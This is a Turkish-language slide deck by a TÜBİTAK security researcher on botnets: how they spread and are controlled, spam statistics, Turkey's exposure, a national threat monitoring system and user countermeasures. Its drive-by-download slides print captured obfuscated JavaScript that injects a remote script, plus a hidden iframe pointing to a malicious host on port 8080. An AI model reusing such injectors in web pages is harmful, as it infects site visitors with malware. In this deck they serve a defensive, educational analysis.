Post on 11-Jun-2018
Botnetler ve Tehdit Gözetleme Sistemi
Botnetler
Ve
Tehdit Gözetleme Sistemi
Necati Ersen ŞİŞECİ
Bilişim Sistemleri Güvenliği Gurubu
TÜBİTAK BİLGEM UEKAE
siseci@uekae.tubitak.gov.tr
16/05/2011
Botnet Nedir?
• Nasıl Çalışır?
• Nasıl Bulaşır?
• Ne Amaçla Kullanılır?
• Nasıl Yönetilir?
• Nasıl Tespit Edilir?
Nasıl Bulaşır?
Örnek Bulaşma Senaryosu
(Drive-by Download)
The Torpig network infrastructure
Ne Amaçla Kullanılır?
Ne Amaçla Kullanılır?
• Spam
• Phishing
• Gizli bilgilerin çalınması
• DDoS Atakları
• Malware yükleme ve dağıtımı
• Tıklama Sahtekarlığı
C&C Mekanizması
• HTTP
• Zeus
• P2P
• Storm
• IRC
• AgoBot, SdBot
• Diğer protokoller
• Svelta
C&C Mekanizması
Botnet C&C Mekanizması ile kullanılan yöntemler (2Q10)
Merkezi C&C
Dağıtık C&C
C&C Mekanizması
Botnet C&C Mekanizması ile kullanılan yöntemler (2Q10)
C&C Mekanizması
• Svelta
Zeus Configuration Tool
İstatistikler
2010’un 1 ve 2nci
çeyreğinde en çok
Microsoft Software
Removal Tool
Tarafından
temizlenen botlar
Spambot İstatistikleri
Lethic: 12.000 – 60.000 msgs/hour/bot
Grum: Mar 2010, 39.9 Billion Spam/day
Cutwail: 74 Billion Spam/day
Mart 2011
Mayıs 2011
14
Gündem
• Tehdit Gözetleme Sistemi nedir?
• Karşı önlemler
• Alt yapı gereksinimleri
• Yapılan Çalışmalar
Tehdit Gözetleme Sistemi Servisleri
• Ulusal Merkezi Saldırı ve Anormallik
Tespiti
• Botnet Tespiti, Engelleme, Ele Geçirme ve
Karşı Önlemler
• Aktif Güvenlik Sağlama
• Balküpleri İle Güvenlik Önlemleri
• Raporlama ve İstatistik Çıkarma
• İnternet Güvenliği Bilgi Deposu Oluşturma
Tehdit Gözetleme Sistemi Servisleri
Sensor
Veritabanı
Web Sunucu
ISP’ler Sensor
Kayıt Sunucuları
TGS MERKEZİ
Verimadeni Sunucuları
Alarmlar
Gerekli Sistem Yetenekleri
Veri kaynakları
Ağ trafik bilgisi
Sistem aktivitleri
Balküpleri
Veri senkranizasyon
Filtreleme
Veritabanı
Sunucuları
Analiz Prosesleri
Analiz Uzmanları
Çıktılar, Raporlar,
Alarmlar
TGS Gündeminden Örnekler
• Nisan 22, 2009. Finjan ekibi 1.9 milyon
birimi yöneten bir botnet tespit etti.
– Merkez sunucular Ukraynada
– Gelişmiş bir kullanım arayüzünden sistemler
yönetilebilmekte, birimler üzerinde komutlar
çalıştırılmakta, kurulum ve web aktiviteleri
gerçekleşebilmektedir.
– Enfekte makinalar forumlarda ticari olarak
sunulmakta, takasları yapılmakta
Kaynak: http://www.securityfocus.com
TGS Gündeminden Örnekler
• Kasım, 2009. FireEye ekibi dünyanın
spam trafiğinin %4.2 sini üreten Ozdok
botnet’ini tespit etti. Sunucuların tespit
edilmesinin ardından Spam trafiği kesildi.
– Merkez sunucular çoğunlukla Amerikada.
ABD dışında sadece Türkiye ve Israil de
sunucuları var.
Kaynak: http://www.fireeye.com
TGS Gündeminden Örnekler
• Eylül, 2009 Hollanda IPS’leri Anti-Botnet
Anlaşması İmzaladılar.
– 14 ISP(%98 pazar payı)
– Hedef; Botnet ve malware tespiti ve
engellemesi
– Temel Maddeler:
• Anlaşmalı ISP’ler arasında ilgili bilgi paylaşımı
• Enfekte olmuş uçların karantinaya alınması
• Son kullanıcıların ISP’ler tarafından haberdar
edilmesi
Kaynak: http://www.i-policy.org
Türkiye ve Botnet’ler
• Turkiye, 2008 verilerine göre Dünya’da* “Botnet”lere ev sahipliği yapan ülkeler sıralamasında 8. – Spam e-posta üretiminde 5. (2008’in son beş ayında 2.)
– 2007’de 15. sıradan 2008’de 9. sıraya çıkarak kötü niyetli faaliyetlerin toplamının %3’unun kaynağı durumundadır. (En hızlı yükselen ülke)
– Yükselen diğer iki ulke, Brezilya ve Polonya’dır.
• İnternet’te yer alan kiralık Botnet ilanlarında Turkiye 40 USD / 1000 bilgisayar ile “ucuz botnet” ligindedir.
• NATO’nun siber savunmadan sorumlu biriminden Türkiye’nin DDoS faaliyetlerine karıştığına dair bilgi alınmaktadır.
• Türkiye’nin elindeki bilgisayar parkı, kendi takdiri dışında kullanılabilecek kuvvetli bir silaha dönüşebilmektedir.
(*) “Symantec Global Internet Security Threat Report. Trends for 2008. Vol. XIV”, 2009/4
Botnetlere karşı
Yeni İnternet tehditlerinin en belirgin örneği olan botnet’lere karşı etkin savunma için:
Bireysel, kurumsal ve ulusal etkin güvenlik politikalarına ihtiyaç vardır.
Yasal yaptırımlar ve eylem prosedürleri belirlenmelidir.
ISP’ler kurumlar ve otoriteler arasında etkin bir işbirliği tesis edilmelidir.
Virüs tarayıcılar, güvenlik duvarları, lokal saldırı tespiti gibi eski güvenlik önlemleri yetersiz kalmaktadır. Yeni teknolojilerle sistemin tamamının resmedilmesi, analiz edilebilmesi gereklidir.
Botnet’i Durdurmak
• Tespit
– Botnet aktivitelerinin tespit edilmesi
– Bot komuta & kontrol merkezlerinin tespit edilmesi
• Analiz
– Enfekte sistemler üzerinde analiz yapılması
– Botnet’in kopyalarının analiz edilmesi, zayıflıklarının çıkartılması
• Önlem
– Enfekte birimlerin yetkililerine bildirilmesi
– IPS’lerde ilgili ağ veya birimlerin karantinaya alınması
– Gerektiğinde aktif olarak botnet’in engellenmesi
Bizim Çalışmalarımız
• BGYS Projesi Kapsamında
– TGS alt yapısı hazırlıkları devam etmektedir.
– Halen 5 honeypot, 2 IDS, 2 Network Flow
sensörü çalışmaktadır. Toplanan veriler ileri
araştırma projelerinde de kullanılmak üzere
büyük veri depolarında saklanmaktadır.
– Kendi TGS arayüzlerimiz hazırlanmaktadır.
Muhtemel Çalışma Ortaklarımız
• ISP'ler
– ISP'ler üzerinde dinleme yapan sensörler
– Olay bildirim/müdahele süreçleri, arayüzleri
• Emniyet Kuvvetleri
– Olay bildirim/müdahele süreçleri, arayüzleri
• İletişim İdare Kurumları
– Hukuki destek
– Ulusal kapsam ve yaygınlaştırma desteği
• Araştırma Kurumları
– Akademik ağlar, sistem yetkilileri
– Akademik laboratuarlar
– Virüs, botnet uzmanları
– Verimadenciliği ve istatistik uzmanları
Örnek Drive-By-Download
'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#
@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u
#)$!(-
!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$
#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w
@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^
g@$(^o@(^o@g@&$l&&#e^))&@-
($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^
&(i$#@n!#^-
#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o
@m^)&/)!c&#(n$)e()&&t)#-
^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-
#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'
Örnek Drive-By-Download
'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#
@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u
#)$!(-
!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$
#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w
@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^
g@$(^o@(^o@g@&$l&&#e^))&@-
($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^
&(i$#@n!#^-
#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o
@m^)&/)!c&#(n$)e()&&t)#-
^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-
#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'
Örnek Drive-By-Download
Firefox
eklentisi
FireBug
Örnek Drive-By-Download
/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p =
document.createElement('script');H3qqea3ur6p.setAttribute('type',
'text/javascript');H3qqea3ur6p.setAttribute('id',
'myscript1');H3qqea3ur6p.setAttribute('src',
'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l
^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-
!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!
#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^
#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))
&@-
($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!
#^-
#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!
c&#(n$)e()&&t)#-
^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-
#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|
#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer',
'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}
Örnek Drive-By-Download
Bir
forumda
aldığım
uyarı
Örnek Drive-By-Download
Rdasznp = 't(&r$$&a#^v^#i&&!^a)n(@^)-
!#c@^o(#m!.(#$u^(@#@n($i$($)v!#!i(@#s!&&i)#o&@n!#.##c$o!#!m@
.##$!r!o(@b$$t@e()&$)x!(-
@c!&o&)m$.$@)@b#l^(u@)(e&()j!$a&c#k^)(i)&(n&)&#.#r&@u$'.repla
ce(/\$|#|\(|&|\^|@|\)|\!/ig, '');
f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.src = 'http://'+Rdasznp+':8080/index.php?js';
document.body.appendChild(f);
Kişisel Olarak Yapılabilecek Önlemler
32
• Lisanslı Anti-virüs Yazılımı Kullanmak
• Anti-virüs yazılımını sürekli güncel tutmak
• İşletim sistemi güncellemelerini sürekli yapmak
• Kişisel güvenlik duvarı kullanmak
• Tanıdığımız kişilerden olsa bile gelen maillerdeki
eklentileri mutlaka taratmak
• USB Belleklerdeki AutoRun virüslerine karşı Autorun’ı
devre dışı bırakmak
• Kullandığımız yazılımların (Örneğin: Adobe Acrobat,
Adobe Flash Player,Java) güncellemelerini sürekli
yapmak.
• JavaScript ataklarına karşı Firefox’u ve eklentisi
NoScript’i kullanmak.
Referanslar
• Choi, H., Lee, Hanwoo, Lee, Heejo, & Kim, H. (2007). Botnet Detection by Monitoring Group
Activities in DNS Traffic. 7th IEEE International Conference on Computer and Information
Technology (CIT 2007), 715-720. Ieee. doi: 10.1109/CIT.2007.90.
• Botnet Detection and Response, David Dagon, 2005, OARC Workshop,
• Understanding and Blocking the New Botnets, 2008, WatchGuard
• Feily, M. (2009). A Survey of Botnet and Botnet Detection. doi: 10.1109/SECURWARE.2009.48.
• Kugisaki, Y., Kasahara, Y., Hori, Y., & Sakurai, K. (2007). Bot Detection Based on Traffic
Analysis. The 2007 International Conference on Intelligent Pervasive Computing (IPC 2007), 303-
306. Ieee. doi: 10.1109/IPC.2007.91.
• Towards Next-Generation Botnets, Ralf Hund et all, 2008 European Conference.
• Richard A. Kemmerer , How to Steal a Botnet and What Can Happen When You Do, 2010
• Stone-gross, B., Cova, M., Cavallaro, L., Gilbert, B., Szydlowski, M., Kemmerer, R., et al. (n.d.).
Your Botnet is My Botnet : Analysis of a Botnet Takeover. Security.
• Taking over the Torpig botnet, http://www.cs.ucsb.edu/~seclab/projects/torpig/ , Richard A
Kemmerer
• A Controlled Environment for Botnet Traffic Generation,
http://www.cse.psu.edu/~tangpong/botnet/, April 2009
• Snort-lightweight intrusion detection for networks, Martin Roesch, Usenix 13th, 1999
• www.honeynet.org
• www.tcpdump.org
• http://www.networksorcery.com/enp/protocol/dns.htm
• http://www.securelist.com/en/analysis/204792003/The_botnet_business
• Microsoft Security Intelligence Report (www.microsoft.com/sir)
• http://www.m86security.com/labs/bot_statistics.asp
Teşekkür
• K.T.U. Bilgi İşlem Daire Başkanı
Yrd. Doç. Dr. Mustafa ULUTAŞ
• GYTE Bilgisayar Mühendisliği
Öğretim görevlisi, Doç. Dr. Hacı
Ali MANTAR
• Ulakbim Müdür Yardımcısı, Sn.
Serkan Orcan
34